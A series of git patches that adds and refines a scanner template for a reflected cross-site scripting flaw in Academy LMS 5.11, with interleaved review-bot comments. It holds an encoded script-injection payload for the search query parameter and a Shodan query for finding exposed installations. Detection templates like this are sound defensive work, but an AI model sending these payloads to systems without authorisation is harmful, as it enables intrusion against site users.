From ea6e61448dbdd20671daa12c336f9144e2cce92b Mon Sep 17 00:00:00 2001
From: Cryptoc0nman <54571841+cryptoconman@users.noreply.github.com>
Date: Mon, 23 Jan 2023 00:02:57 +0530
Subject: [PATCH 1/3] Create alms-xss
---
vulnerabilities/other/alms-xss | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 vulnerabilities/other/alms-xss
diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/alms-xss
new file mode 100644
index 0000000000..4179e6a857
--- /dev/null
+++ b/vulnerabilities/other/alms-xss
@@ -0,0 +1,32 @@
+id: alm
+
+info:
+ name: Academy Learning Management System v5.1.1 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
+ reference:
+ - https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
+ metadata:
+ shodan-query: http.html:"Academy LMS"
+ verified: "true"
+ tags: xss,lms
+
+requests:
+ - raw:
+ - |
+ GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
+ Host: {{Hostname}}
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - ''
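Review bot: The only entry under `words:` in the body matcher at the end of this hunk is the empty string `''`, which matches every response, so as written the template reports any host that answers 200 on `/search`. If the file really holds an empty word (rather than the page having lost the text), it should be the decoded form of the payload sent in the request, `- '"><script>alert(document.domain)</script>'`, so that only an unescaped reflection matches. The same `''` entry is carried as context into the matcher hunk of patch 2/3 and is untouched by patch 3/3. The `'Academy LMS'`, `text/html` and status checks added there identify the product and response type, not the flaw.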
From 243b12571c3cea880584d3d5ffdebd5c58f037a3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Mon, 23 Jan 2023 10:57:54 +0530
Subject: [PATCH 2/3] matcher-update
added additional data to keep the template uniform
---
.../other/{alms-xss => academy-lms-xss.yaml} | 29 ++++++++++---------
1 file changed, 15 insertions(+), 14 deletions(-)
rename vulnerabilities/other/{alms-xss => academy-lms-xss.yaml} (61%)
diff --git a/vulnerabilities/other/alms-xss b/vulnerabilities/other/academy-lms-xss.yaml
similarity index 61%
rename from vulnerabilities/other/alms-xss
rename to vulnerabilities/other/academy-lms-xss.yaml
index 4179e6a857..65a7a563f8 100644
--- a/vulnerabilities/other/alms-xss
+++ b/vulnerabilities/other/academy-lms-xss.yaml
@@ -1,32 +1,33 @@
-id: alm
+id: academy-lms-xss
info:
- name: Academy Learning Management System v5.1.1 - Cross-Site Scripting
+ name: Academy LMS 5.11 Cross Site Scripting
author: arafatansari
severity: medium
description: |
Academy Learning Management System contains a reflected cross-site scripting vulnerability via the Search parameter.
reference:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- metadata:
+ - https://vulners.com/packetstorm/PACKETSTORM:170514
+ metadata:
shodan-query: http.html:"Academy LMS"
verified: "true"
- tags: xss,lms
+ tags: xss,lms,academy
requests:
- - raw:
- - |
- GET /search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
- Host: {{Hostname}}
-
+ - method: GET
+ path:
+ - "{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
-
- - type: word
+ - type: word
part: body
words:
- ''
+ - 'Academy LMS'
+ condition: and
+
+ - type: status
+ status:
+ - 200
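Review bot: The description kept as context in this hunk names "the Search parameter", but the request added here sends the payload in `query` on the `/search` path. I would reword it to `Academy Learning Management System contains a reflected cross-site scripting vulnerability via the query parameter of /search.` so that a finding maps to the right input. Since this commit is about uniform metadata, the `info` block could also carry a `classification` entry with `cwe-id: CWE-79`.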
From 095df8edcc43d3aafab47a4bd4705d31589a1708 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 23 Jan 2023 15:24:33 +0530
Subject: [PATCH 3/3] updated matchers
---
vulnerabilities/other/academy-lms-xss.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/vulnerabilities/other/academy-lms-xss.yaml b/vulnerabilities/other/academy-lms-xss.yaml
index 65a7a563f8..baefca419a 100644
--- a/vulnerabilities/other/academy-lms-xss.yaml
+++ b/vulnerabilities/other/academy-lms-xss.yaml
@@ -1,7 +1,7 @@
id: academy-lms-xss
info:
- name: Academy LMS 5.11 Cross Site Scripting
+ name: Academy LMS 5.11 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
@@ -10,9 +10,9 @@ info:
- https://packetstormsecurity.com/files/170514/Academy-LMS-5.11-Cross-Site-Scripting.html
- https://vulners.com/packetstorm/PACKETSTORM:170514
metadata:
- shodan-query: http.html:"Academy LMS"
verified: "true"
- tags: xss,lms,academy
+ shodan-query: http.html:"Academy LMS"
+ tags: lms,academy,xss
requests:
- method: GET
@@ -28,6 +28,11 @@ requests:
- 'Academy LMS'
condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: status
status:
- 200
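Review bot: The added header matcher looks for `text/html` anywhere in the response headers and is case-sensitive, so it is not tied to the Content-Type line. Adding `case-insensitive: true` to this matcher would keep a server that sends a differently-cased media type from being missed. A short comment above it, such as `# only report reflections served as HTML`, would record why the check exists. The matchers list starts outside this hunk.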